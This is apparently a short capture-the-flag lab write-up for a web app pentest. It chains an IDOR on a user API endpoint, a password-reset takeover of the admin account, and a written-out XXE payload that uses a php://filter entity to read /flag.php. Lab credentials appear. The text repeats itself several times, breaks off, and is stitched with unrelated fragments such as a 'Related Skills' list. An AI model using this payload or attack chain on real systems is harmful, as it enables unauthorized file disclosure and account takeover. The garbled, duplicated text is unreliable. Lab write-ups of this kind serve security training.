Scenario:

Performing a web app pentest for sof comanpym and task y iwth testing the lastest of their social network web app. Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.

94.237.53.52:5948

Write up:

Enumeration in caido

User htb-student
Pass: Academy_student!

301 redirect response following a successful login.
200 ok resposne
Api get

Potential IDOR: We'll focus on the dir /api.php/user/74

Automate Then we cam enumerate the users and find de admin user for login. We can chage the password in the dir /reset.php. Reset Now we can access to the admin user ---> PWD

4.Exploit with php filetering

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
    <!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">]>
<root>
  <name>&Test;</name>
  <details>test</details>
   <date></date>
</root>

Scenario:

94.237.53.52:5948

Write up:

Enumeration in caido

User htb-student
Pass: Academy_student!

301 redirect response following a successful login.
200 ok resposne
Api get

Potential IDOR: We'll focus on the dir /api.php/user/74

Automate Then we cam enumerate the users and find de admin user for login. We can chage the password in the dir /reset.php. Reset Now we can access to the admin user ---> PWD

4.Exploit with php filetering

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
    <!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">]>
<root>
  <name>&Test;</name>
  <details>test</details>
   <date></date>
</root>

Scenario:

Scenario:

94.237.53.52:5948

Write up:

Enumeration in caido

Related Skills

Nano Banana Pro

Markdown Converter

1password

Scenario:

94.237.53.52:5948

Write up:

Enumeration in caido